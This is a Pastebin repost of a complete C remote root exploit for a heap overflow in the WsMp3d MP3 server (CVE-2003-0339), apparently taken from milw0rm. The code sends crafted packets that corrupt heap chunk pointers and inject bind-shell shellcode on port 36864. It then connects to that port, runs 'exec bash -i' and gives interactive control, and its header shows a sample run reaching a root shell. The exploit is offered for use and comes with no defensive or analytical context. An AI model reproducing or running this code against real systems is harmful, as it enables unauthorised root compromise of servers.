Advertisement
FlyFar

WsMp3d 0.x - Remote Heap Overflow - CVE-2003-0339

Jan 24th, 2024
484
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 9.97 KB | Cybersecurity | 0 0
  1. /*
  2. **
  3. ** [*] Title: Remote Heap Corruption Overflow vulnerability in WsMp3d
  4. ** [+] Exploit: 0x82-Remote.WsMp3d.again.c
  5. **
  6. ** bash$ ./0x82--Remote.WsMp3d.again -h 61.37.xxx.xx -t2
  7. **
  8. **  WsMp3 Server Heap Corruption Remote root exploit
  9. **                                             by Xpl017Elz.
  10. **  [+] Hostname: 61.37.xxx.xx
  11. **  [+] Port num: 8000
  12. **  [+] Retloc address: 0x8058d8c
  13. **  [+] Retaddr address: 0x80648bf
  14. **  [1] #1 Set socket.
  15. **  [2] First, send exploit packet.
  16. **  [3] #2 Set socket.
  17. **  [4] Second, send exploit packet.
  18. **  [5] Waiting, executes the shell ! (3Sec)
  19. **  [6] Trying 61.37.xxx.xx:36864 ...
  20. **  [7] Connected to 61.37.xxx.xx:36864 !
  21. **
  22. **  [*] Executed shell successfully !
  23. **
  24. ** Linux xpl017elz 2.2.12-20kr #1 Tue Oct 12 17:08:15 KST 1999 i586 unknown
  25. ** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
  26. ** 6(disk),10(wheel)
  27. ** bash#
  28. **
  29. **
  30. */
  31.  
  32. #include <stdio.h>
  33. #include <unistd.h>
  34. #include <sys/socket.h>
  35. #include <netdb.h>
  36. #include <netinet/in.h>
  37.  
  38. struct op_plat_st
  39. {
  40.     int op_plat_num;
  41.     char *op_plat_sys;
  42.     u_long retloc;
  43.     u_long retaddr;
  44.     int off_st;
  45. };
  46. struct op_plat_st __pl_form[]=
  47. {
  48.     /*{num,linux,globl val,heap val}*/
  49.     {0,"Linux WsMp3 Binary I (Default)",0x08059490,0x08064e8f,0},
  50.     {1,"Linux WsMp3 Binary II (Default)",0x08059490,0x08063e97,0},
  51.     //08058d8c R_386_JUMP_SLOT   malloc
  52.     {2,"RedHat Linux 6.1 (Compile)",0x08058d8c,0x080648bf,0},
  53.     {3,"RedHat Linux 6.2 (Compile)",0x08058d8c,0x080646f3,0},
  54.     {4,"RedHat Linux 7.0 (Compile)",0x0809aa68,0x080a5cb3,0},
  55.     {5,"Linux all DoS (Compile)",0x82828282,0x82828282,0},
  56. /*  {6,"RedHat Linux 7.1",0x0,0x0,1},
  57.     {7,"RedHat Linux 8.0",0x0,0x82828282,1},
  58.     {8,"RedHat Linux 9.0",0x0,0x82828282,1},
  59. */
  60.     {0x82,NULL,0,0,0}
  61. };
  62.  
  63. int sexsock(char *conn_host_nm,int conn_port_nm);
  64. void start_shell(int st_sock_va);
  65. void re_connt_lm(int st_sock_va);
  66. void __xpl_banrl();
  67. void x_fp_rm_usage(char *x_fp_rm);
  68. int __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx);
  69.  
  70. void __xpl_banrl()
  71. {
  72.     fprintf(stdout,"\n WsMp3 Server Heap Corruption Remote root exploit (Again)\n");
  73.     fprintf(stdout,"                                            by Xpl017Elz.\n");
  74. }
  75.  
  76. void x_fp_rm_usage(char *x_fp_rm)
  77. {
  78.     int __t_xmp=0;
  79.     fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);
  80.     fprintf(stdout,"\t -h [hostname] - target host.\n");
  81.     fprintf(stdout,"\t -p [port]     - port number.\n");
  82.     fprintf(stdout,"\t -r [addr]     - retloc address. (malloc globl)\n");
  83.     fprintf(stdout,"\t -s [addr]     - &shellcode address.\n\n");
  84.     fprintf(stdout," Example> %s -h target_hostname -p 8000\n",x_fp_rm);
  85.     fprintf(stdout," Select target number>\n\n");
  86.     for(;;)
  87.     {
  88.         if(__pl_form[__t_xmp].op_plat_num==(0x82))
  89.             break;
  90.         else
  91.         {
  92.            
  93. fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
  94.         }
  95.         __t_xmp++;
  96.     }
  97.     fprintf(stdout,"\n");
  98.     exit(0);
  99. }
  100.  
  101. /*
  102. ** name: desc->action (free)
  103. ** content: chat cmd ("CHA")
  104. ** content size: 3
  105. ** buffer size: 4+12 (Bin:1000[0])
  106. **
  107. ** name: desc->what
  108. ** content: garbage (clear)
  109. ** content size: 1024
  110. ** buffer size: 4+4+1+1024 (Bin:1000000100[1])
  111. */
  112.  
  113. int __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx)
  114. {
  115.     int wy_clean_data_q;
  116.     char nop_n_jump[]={0x42,0x0c,0xeb,0x41};
  117.     int atk_buf_pos=0;
  118.     char oxa_oxd[]={0x0a,0x0d};
  119. #define PORT_Q (36864)
  120. #define __CLN_DT_LEN ((0x00000400)+(0x00000001))
  121.     char step_atk_code_st[PORT_Q];
  122. #define __OF_BY_ONE (0x01)
  123.     char p_rev_size[]={0xfc,0xff,0xff,0xff}; /* chunk size */
  124.     char __size_fd[]={0xff,0xff,0xff,0xff}; /* data section size */
  125.     char cln_dt_buf[__CLN_DT_LEN];
  126.     char chat_inf_send_code[]={0x43,0x48,0x41};
  127.     char shellcode[]={
  128.         /* bindshell port 36864 */
  129.         0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10,
  130.         0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89,
  131.         0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd,
  132.         0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89,
  133.         0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89,
  134.         0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89,
  135.         0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c,
  136.         0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89,
  137.         0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80,
  138.         0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66,
  139.         0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29,
  140.         0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80,
  141.         0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07,
  142.         0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c,
  143.         0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff,
  144.         0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
  145.     };
  146.     int send_shcode_lsz=sizeof(shellcode);
  147.  
  148.     memset((char *)cln_dt_buf,0x82,sizeof(cln_dt_buf));
  149.     memset((char *)step_atk_code_st,0,sizeof(step_atk_code_st));
  150.     /*
  151.     desc->action:malloc(10); // cleanup
  152.     */
  153.     memcpy(step_atk_code_st+atk_buf_pos,chat_inf_send_code,sizeof(chat_inf_send_code));
  154.     atk_buf_pos+=(sizeof(chat_inf_send_code));
  155.     memset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);
  156.     atk_buf_pos+=(__OF_BY_ONE);
  157.     /*
  158.     void rem_req_descriptor(req_descriptor *desc);
  159.     desc->what[sizeof(desc->what)]='\0';free(desc->what);desc->what=NULL;
  160.     */
  161.     memcpy(step_atk_code_st+atk_buf_pos,cln_dt_buf,sizeof(cln_dt_buf));
  162.     atk_buf_pos+=(sizeof(cln_dt_buf));
  163.     /* chunk size */
  164.     memcpy(step_atk_code_st+atk_buf_pos,p_rev_size,sizeof(p_rev_size));
  165.     atk_buf_pos+=(sizeof(p_rev_size));
  166.     /* data section size */
  167.     memcpy(step_atk_code_st+atk_buf_pos,__size_fd,sizeof(__size_fd));
  168.     atk_buf_pos+=(sizeof(__size_fd));
  169.     {
  170.         *(long *)&step_atk_code_st[atk_buf_pos]=(fd_sx-(0x0c));
  171.         atk_buf_pos+=4; /* forward ptr */
  172.         *(long *)&step_atk_code_st[atk_buf_pos]=(bk_sx);
  173.         atk_buf_pos+=4; /* back ptr */
  174.     }
  175.     memset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);
  176.     atk_buf_pos+=(__OF_BY_ONE);
  177.     for(wy_clean_data_q=0;wy_clean_data_q<0x190;wy_clean_data_q+=4)
  178.     {
  179.         memcpy(step_atk_code_st+atk_buf_pos,nop_n_jump,sizeof(nop_n_jump));
  180.         atk_buf_pos+=(sizeof(nop_n_jump));
  181.     }
  182.     memcpy(step_atk_code_st+atk_buf_pos,shellcode,sizeof(shellcode));
  183.     atk_buf_pos+=(sizeof(shellcode));
  184.     memcpy(step_atk_code_st+atk_buf_pos,oxa_oxd,sizeof(oxa_oxd));
  185.     atk_buf_pos+=(sizeof(oxa_oxd));
  186.  
  187.     send(st_sock_va,step_atk_code_st,strlen(step_atk_code_st),0);
  188.     return(st_sock_va);
  189. }
  190.  
  191. int main(int argc,char *argv[])
  192. {
  193.     int sock,tg_sk;
  194. #define D_PORT (8000)
  195. #define ATK_CPT (36864)
  196.     int port=(D_PORT);
  197. #define D_HOST "x82.inetcop.org"
  198.     char hostname[0x82]=D_HOST;
  199.     int whlp,type=0;
  200.  
  201.     u_long retloc=__pl_form[type].retloc;
  202.     u_long retaddr=__pl_form[type].retaddr;
  203.  
  204.     (void)__xpl_banrl();
  205.     while((whlp=getopt(argc,argv,"T:t:R:r:S:s:H:h:P:p:IiXx"))!=EOF)
  206.     {
  207.         extern char *optarg;
  208.         switch(whlp)
  209.         {
  210.             case 'T':
  211.             case 't':
  212.                 if((type=atoi(optarg))<6)
  213.                 {
  214.                     retloc=__pl_form[type].retloc;
  215.                     retaddr=__pl_form[type].retaddr;
  216.                 }
  217.                 else (void)x_fp_rm_usage(argv[0]);
  218.                 break;
  219.  
  220.             case 'R':
  221.             case 'r':
  222.                 retloc=strtoul(optarg,NULL,0);
  223.                 break;
  224.                
  225.             case 'S':
  226.             case 's':
  227.                 retaddr=strtoul(optarg,NULL,0);
  228.                 break;
  229.                
  230.             case 'H':
  231.             case 'h':
  232.                 memset((char *)hostname,0,sizeof(hostname));
  233.                 strncpy(hostname,optarg,sizeof(hostname)-1);
  234.                 break;
  235.                
  236.             case 'P':
  237.             case 'p':
  238.                 port=atoi(optarg);
  239.                 break;
  240.                
  241.             case 'I':
  242.             case 'i':
  243.                 fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
  244.                 exit(-1);
  245.                
  246.             case '?':
  247.                 (void)x_fp_rm_usage(argv[0]);
  248.                 break;
  249.         }
  250.     }
  251.    
  252.     if(!strcmp(hostname,D_HOST))
  253.     {
  254.         (void)x_fp_rm_usage(argv[0]);
  255.     }
  256.     {
  257.         fprintf(stdout," [+] Hostname: %s\n",hostname);
  258.         fprintf(stdout," [+] Port num: %d\n",port);
  259.         fprintf(stdout," [+] Retloc address: %p\n",retloc);
  260.         fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
  261.     }
  262.     fprintf(stdout," [1] #1 Set socket.\n");
  263.     sock=(int)sexsock(hostname,port);
  264.     (void)re_connt_lm(sock);
  265.    
  266.     fprintf(stdout," [2] First, send exploit packet.\n");
  267.     sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);
  268.     close(sock);
  269.    
  270.     fprintf(stdout," [3] #2 Set socket.\n");
  271.     sock=(int)sexsock(hostname,port);
  272.     (void)re_connt_lm(sock);
  273.    
  274.     fprintf(stdout," [4] Second, send exploit packet.\n");
  275.     sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);
  276.    
  277.     fprintf(stdout," [5] Waiting, executes the shell ! (3Sec)\n");
  278.     sleep(3);
  279.    
  280.     fprintf(stdout," [6] Trying %s:%d ...\n",hostname,(ATK_CPT));
  281.     tg_sk=(int)sexsock(hostname,(ATK_CPT));
  282.     (void)re_connt_lm(tg_sk);
  283.  
  284.     fprintf(stdout," [7] Connected to %s:%d !\n\n",hostname,(ATK_CPT));
  285.     (void)start_shell(tg_sk);
  286.  
  287.     exit(0);
  288. }
  289.  
  290. int sexsock(char *conn_host_nm,int conn_port_nm)
  291. {
  292.     int sock;
  293.     struct hostent *sxp;
  294.     struct sockaddr_in sxp_addr;
  295.  
  296.     if((sxp=gethostbyname(conn_host_nm))==NULL)
  297.     {
  298.         herror(" [-] gethostbyname() error");
  299.         return(-1);
  300.     }
  301.     if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
  302.     {
  303.         perror(" [-] socket() error");
  304.         return(-1);
  305.     }
  306.     sxp_addr.sin_family=AF_INET;
  307.     sxp_addr.sin_port=htons(conn_port_nm);
  308.     sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
  309.     bzero(&(sxp_addr.sin_zero),8);
  310.  
  311.     if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
  312.     {
  313.         perror(" [-] connect() error");
  314.         return(-1);
  315.     }
  316.  
  317.     return(sock);
  318. }
  319.  
  320. void start_shell(int st_sock_va)
  321. {
  322.     int died;
  323.     char *command="uname -a; id; export TERM=vt100; exec bash -i\n";
  324.     char readbuf[1024];
  325.     fd_set rset;
  326.     memset((char *)readbuf,0,sizeof(readbuf));
  327.     fprintf(stdout," [*] Executed shell successfully !\n\n");
  328.     send(st_sock_va,command,strlen(command),0);
  329.  
  330.     for(;;)
  331.     {
  332.         fflush(stdout);
  333.         FD_ZERO(&rset);
  334.         FD_SET(st_sock_va,&rset);
  335.         FD_SET(STDIN_FILENO,&rset);
  336.         select(st_sock_va+1,&rset,NULL,NULL,NULL);
  337.  
  338.         if(FD_ISSET(st_sock_va,&rset))
  339.         {
  340.             died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
  341.             if(died<=0)
  342.                 exit(0);
  343.             readbuf[died]=0;
  344.             fprintf(stdout,"%s",readbuf);
  345.         }
  346.         if(FD_ISSET(STDIN_FILENO,&rset))
  347.         {
  348.             died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
  349.             if(died>0)
  350.             {
  351.                 readbuf[died]=0;
  352.                 write(st_sock_va,readbuf,died);
  353.             }
  354.         }
  355.     }
  356.     return;
  357. }
  358.  
  359. void re_connt_lm(int st_sock_va)
  360. {
  361.     if(st_sock_va==-1)
  362.     {
  363.         fprintf(stdout," [-] Failed.\n\n");
  364.         fprintf(stdout," Happy Exploit ! :-)\n\n");
  365.         exit(-1);
  366.     }
  367. }
  368.  
  369.  
  370. // milw0rm.com [2003-05-22]
  371.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement